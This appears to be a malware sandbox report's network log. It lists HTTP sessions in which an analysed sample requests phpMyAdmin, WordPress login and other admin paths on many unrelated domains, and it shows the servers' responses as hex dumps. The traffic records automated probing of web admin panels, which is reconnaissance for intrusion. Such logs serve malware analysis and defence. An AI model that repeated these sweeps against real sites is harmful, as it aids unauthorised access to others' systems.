                                                                                                                                                                                                                                                                                                                                                                Data Ascii: auKw]d^5}v{5~z=o=vWWnX_%5+fE*{}%2wrlzz\oCL)6~l>x~?A96irocW}<k>I_d7z`_Jh>tu
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.190342903 CET1286INData Raw: be db dd b7 fb c7 f1 e7 34 16 12 db d2 7f 30 f7 ef 3d 4a df 76 37 fb c5 d0 96 b7 dd e6 79 ac 87 b7 a6 53 9f 4d 33 9b 2d ee ba f2 a1 dc ee 6f 66 5f fc 35 63 74 9b 55 fb be bc 5b df 71 f4 77 87 ed 66 96 25 3d b7 29 7e bd ea 86 3f fc f6 5f 8a bc 48
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 40=Jv7ySM3-of_5ctU[qwf%=)~?_Hb?~S7xBnIDYbCptA<7)fv^]BmpnZj~}{8PB0vP/~_U%~h1"/u~,i.I
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.190378904 CET1286INData Raw: 35 05 70 9d d7 3a 93 92 37 ff b1 3e d2 70 5c 5a 7e 3f ca 37 dc 94 2f 0f cb 7d 77 37 a8 e1 f1 ae 9d 7f 31 b4 ef 87 d9 77 8b e3 22 df 7e 71 f9 6a f6 5f d4 c5 e7 7f fc e6 1f 7f f5 fb 5f fd 51 fd 97 d9 ab e3 62 af 86 07 b4 7e 3c b4 47 fc b4 ed e6 77
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 5p:7>p\Z~?7/}w71w"~qj__Qb~<Gw=j\8oF-:Q<<}w-b-[}jno-."|[#-/z3@ogtYw.,/Prlv{]jr==^P4p}w4
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.190414906 CET1286INData Raw: b8 e3 10 80 ad a6 30 86 4f c7 b1 33 f4 26 48 39 f7 c4 fb 79 98 e0 49 f4 a4 32 b1 f4 b6 39 52 d8 86 62 b2 69 10 39 6b 83 b6 b6 0a 9c da 00 2a 2c 15 ec 5a 9b a6 4c a1 26 3e e0 17 7c 55 45 a7 61 1c 6d 17 6c 8d 09 36 1c 0d 1e 4c 82 d4 75 4c 34 82 c1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0O3&H9yI29Rbi9k*,ZL&>|UEaml6LuL4,zKL(pd9f%4q^b1<9uru*c>Dsv&g'|E!UNgeZSy>:q*Alaaa;;h|C.XXF.JWy{
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.190449953 CET1286INData Raw: da 2c 51 71 60 18 cd 6e 65 19 43 49 55 96 ce 8a bc 86 3c f4 3a c2 43 da d0 5a 62 7c 23 62 47 c1 e5 64 63 53 51 da da d9 71 1b 27 4e 85 42 4d 1a 7c 59 55 34 41 10 a7 72 8f 93 53 c1 37 cf 4a 36 16 5d b9 53 06 1e 4a 1f a8 20 9d 8d f1 75 2d 0a b2 da
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ,Qq`neCIU<:CZb|#bGdcSQq'NBM|YU4ArS7J6]SJ u-;#m7$;<$OULJ<lgG6CvQ;-I`XKGqMVdR3Ht3nsbX_o=n5/v-krY
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.190484047 CET437INData Raw: d0 f2 93 95 db e1 a5 a1 41 f3 65 ce eb 75 2c 8d 0d 3c ab 7a 07 e4 14 d4 8a a0 35 1f c6 d8 66 1e a1 66 4a b4 43 d3 98 21 4b 8b 27 ba 22 9f f9 46 9e 73 aa 9a c6 93 1c 35 a9 55 93 a6 6a 52 95 73 72 95 3a 65 66 33 9d 33 b1 b4 93 a5 05 a6 12 c8 bd 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Aeu,<z5ffJC!K'"Fs5UjRsr:ef33l1QS43coZ}i71i6N&^JEHW:&$M<'F8cE<%T^Zz\uO!j{AK \Mq7wSYx*
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.190520048 CET1286INData Raw: 32 30 30 30 0d 0a a7 e2 f2 62 76 b7 18 d6 97 af 2e 66 87 c7 db eb 6d 8f 28 07 aa 5b cd 8b 6e b9 dd e8 65 bf 3d b4 85 3a 76 ed c3 d7 db f7 f3 a2 62 c3 a0 9c 2d 90 cc 6a b5 ec 17 87 c3 bc 60 6c 0a 85 ba 2b eb 64 32 7e e0 72 31 30 e9 04 b5 a0 c2 1a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2000bv.fm([ne=:vb-j`l+d2~r102Pr1rCxKp{sZ0<?CU*:S>N?4eMY:]_pjy?X%/NM204Z
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.190555096 CET1286INData Raw: d6 32 eb 7c 82 3b 7d 52 37 bf 66 70 95 8b f9 e6 bc 73 3e 6d 46 2b 12 98 aa ce 1a 68 c9 e7 34 68 67 2d 16 a7 08 79 00 fd 71 6a 67 53 3c 0f 43 8b f3 cd 19 96 3a 29 8d 7c 25 af 67 19 f3 99 6f 90 ff 74 15 e5 c3 3a 8a bd 3b f5 93 1e 67 df 19 31 73 06
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2|;}R7fps>mF+h4hg-yqjgS<C:)|%got:;g1s*Q_&eMyK>]2S|V=S$_I|"G1-6hy4',@U?]5B&%#62NS:+@twkvYiuXI9bX_o=n
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.190591097 CET1286INData Raw: 8c 39 b2 43 dd ac 01 08 f4 1e f3 07 dc 53 87 a3 11 9b e2 a3 4e 11 69 f2 f5 74 65 8c d8 db a6 32 e0 29 a4 e6 a8 d3 09 0a bf 22 1c 46 33 04 47 51 e0 36 53 56 26 e5 10 cb d9 cc 44 76 64 3e f1 cc 33 f8 73 0c 59 8f 3a 62 c0 b9 67 93 ac 78 13 b8 70 c2
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 9CSNite2)"F3GQ6SV&Dvd>3sY:bgxp>M1T212CM!lo,dL9jW9'cItc9 p$-aw36PJR/wc!{fpho!IW*$*zIF2-4v4?EM8
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.292263031 CET1286INData Raw: cc 0e 8f b7 d7 db 1e 51 0e 54 b7 9a 17 dd 72 bb d1 ef fa 6e f9 fd be 50 c7 ae 7d f8 7a fb 7e 5e 54 b0 a5 ad 95 b3 05 b2 59 ae 96 fd e2 70 98 17 8c 4d a1 50 78 65 31 3d 45 25 e7 ce 96 c6 06 14 b9 32 3a ba 38 54 cd 20 67 be 39 9a ba 34 1e 3e 56 92
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: QTrnP}z~^TYpMPxe1=E%2:8T g94>V'O1'_O:y&Etelmin3R9SMnG7c).oIzKMzX)m/;.M]iX}.WuY,Mdj4z6


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                459192.168.2.66394854.71.181.16080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.061645031 CET182OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucivirtual.uci.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.236547947 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:23 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.236574888 CET97INData Raw: 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                460192.168.2.663979103.224.182.21080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.069947958 CET178OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.234778881 CET346INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                                                                                                                                                set-cookie: __tad=1707131768.7567410; expires=Thu, 02-Feb-2034 11:16:08 GMT; Max-Age=315360000
                                                                                                                                                                                                                                                                                                                                                                location: http://ww16.followerstiktok.xyz/admin.php?sub1=20240205-2216-0830-9373-ed2bb15864e8
                                                                                                                                                                                                                                                                                                                                                                content-length: 2
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                461192.168.2.66396864.190.63.11180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.103563070 CET170OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: foros.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.314415932 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                462192.168.2.6641973.161.150.6980
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.139760017 CET181OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.booking.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.241449118 CET581INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://account.booking.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 ef4d1d652a04133dcc01bb4f66ae886a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P5
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 5lmlXqoWE1MOULL11tniUk5blWPxVIjswV1SzBCEksdTH1PH5KB3Ew==
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.822598934 CET229OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.booking.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://account.booking.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.925257921 CET578INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://account.booking.com/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 ef4d1d652a04133dcc01bb4f66ae886a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P5
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: RK1Gqr68aJro8TAlk6ZtFZcSFqMo5ERcTVGlwbOPDDLn-3HJu7G2SQ==
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                463192.168.2.66402964.190.63.11180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.163333893 CET165OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: foros.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.372397900 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                464192.168.2.664110185.51.191.4880
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.201529980 CET283OUTGET /admin/w/login HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: innovationdevelopment.eu
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: VISITORID=6f23480ee7ffaf87556eb25c893227a7; PHPSESSID=81af54a664f4ec74095989818025e221
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.558607101 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 33 35 37 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 74 69 74 6c 65 3e 49 6e 6e 6f 6d 65 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 79 73 74 65 6d 2e 63 73 73 3f 76 3d 31 2e 38 30 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6c 61 67 73 2e 63 73 73 3f 76 3d 31 2e 38 30 38 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 61 63 6b 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6c 65 61 72 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 6e 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 3e 0d 0a 09 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 6e 6e 6f 76 61 74 69 6f 6e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e 65 75 2f 61 64 6d 69 6e 2f 61 64 6d 69 